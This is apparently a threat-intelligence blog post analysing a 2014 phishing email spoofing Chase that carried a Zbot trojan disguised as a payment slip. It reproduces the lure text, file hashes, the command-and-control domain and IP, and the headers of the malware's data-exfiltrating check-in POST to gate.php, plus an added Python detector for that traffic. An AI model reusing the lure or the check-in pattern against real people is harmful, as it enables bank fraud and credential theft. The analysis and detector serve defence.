Chase Morgan Phishing Campaign = Zbot


Email:

From: Chase Morgan [mailto:gens@chase.com]
Sent: Tuesday, January 07, 2014 3:36 AM
Subject: Transaction Alert

Dear Customer,
Below attached is copy of the Telegraphic transfer slip as initiated from our bank to your account as instructed by,your adviced to print out copy of transfer slip for confirmation.
Regards,
Dennison Mark
#note they still can't spell 😛

# File
Zip File attachment: Payment_Slip.zip
The file inside the archive is actually Payment Slip.scr (a screensaver extension, but a normal PE executable as the file type below confirms).

# DFIR
https://malwr.com/analysis/ZDAxMzRhNWI3YWU5NDQ4NmE4ZGY3ZjNkZjZjOTAzOTI/
FILE NAME Payment Slip.scr
FILE SIZE 229689 bytes
FILE TYPE PE32 executable (GUI) Intel 80386, for MS Windows
MD5 ddf15baab37ffb9d63c8095f6fad20f0
SHA1 c56ca8e346a9ff2f3de9d44d2aa9f6662ddfc8fe
SHA256 84c595902978bf5a9a9343b62c8a650e34b3000355ce8b554887dd4e37989c3e
SHA512 db307fd4c251a8507f5a497353bac95473b02aed3b5b964f303f99e71a0bf65b5e5eb35dc5fed7cd89bc39c85fdb87bdf5e563be49e4525b0a91193a8a578885
CRC32 20434565
SSDEEP 6144:n0PyNAsjNceWItMN8HedzJenWoQAJD0N4YEv2Fkbl:nUG68HmJenWoQsO4ZOFS
YARA
  • shellcode – Matched shellcode byte patterns

Hosts

IP
208.64.67.36
74.125.136.105
74.125.136.94

Domains

DOMAIN IP
balharbourcondo[.]com 208.64.67.36
www.google.com 74.125.136.103
www.google.nl 74.125.136.94

Exfiltration / check-in snippet, a POST to http://balharbourcondo[.]com/item/gate[.]php (the encrypted request body has been omitted):
POST /item/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)
Host: balharbourcondo.com
Content-Length: 346
Connection: Keep-Alive
Cache-Control: no-cache

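An added example, not code from the original post: a small detector for the check-in pattern in the capture above. It parses raw HTTP request text and flags requests combining the three traits seen there, a POST to a gate.php path, the legacy "MSIE 6.0 ... InfoPath.2" User-Agent, and a body that is mostly non-printable (high-entropy) bytes rather than form data. The two sample requests are constructed for the demo; only the host name and headers are taken from the capture, the binary body is made up.

```python
import math
import re
from collections import Counter

def parse_request(raw: bytes):
    """Split a raw HTTP request into (method, path, headers dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body

def shannon_entropy(data: bytes) -> float:
    """Bits per byte: plain text lands near 4-5, encrypted or compressed data near 7.5+."""
    if not data:
        return 0.0
    counts = Counter(data)
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def zbot_checkin_indicators(raw: bytes) -> list:
    """Return the names of the indicators that match; an empty list means nothing matched."""
    method, path, headers, body = parse_request(raw)
    hits = []
    if method == "POST" and re.search(r"/gate\.php$", path):
        hits.append("post_to_gate_php")
    ua = headers.get("user-agent", "")
    if "MSIE 6.0" in ua and "InfoPath.2" in ua:
        hits.append("legacy_msie6_infopath_ua")
    # Threshold of 6.5 bits/byte separates encrypted blobs from URL-encoded form fields.
    if body and shannon_entropy(body) > 6.5:
        hits.append("high_entropy_body")
    return hits

# Constructed samples: the first mirrors the captured check-in (body is a made-up
# 256-byte blob), the second is an ordinary web form POST that should not match.
ZBOT_LIKE = (b"POST /item/gate.php HTTP/1.1\r\nAccept: */*\r\n"
             b"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)\r\n"
             b"Host: balharbourcondo.com\r\nContent-Length: 256\r\nConnection: Keep-Alive\r\n\r\n"
             + bytes(range(256)))
BENIGN = (b"POST /login HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0) Firefox/120.0\r\n"
          b"Host: intranet.example\r\nContent-Length: 27\r\n\r\nuser=alice&password=hunter2")

if __name__ == "__main__":
    for name, req in (("zbot_like", ZBOT_LIKE), ("benign", BENIGN)):
        print(name, zbot_checkin_indicators(req))
```

Any single indicator on its own is weak (old user agents and gate.php paths both occur legitimately); the value is in alerting when all three coincide, which is what the captured request does.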


IP ADDRESSES

First seen: 10/10/13
Last seen: 1/7/14
KNOWN DOMAINS HOSTED BY 208.64.67.36

By admin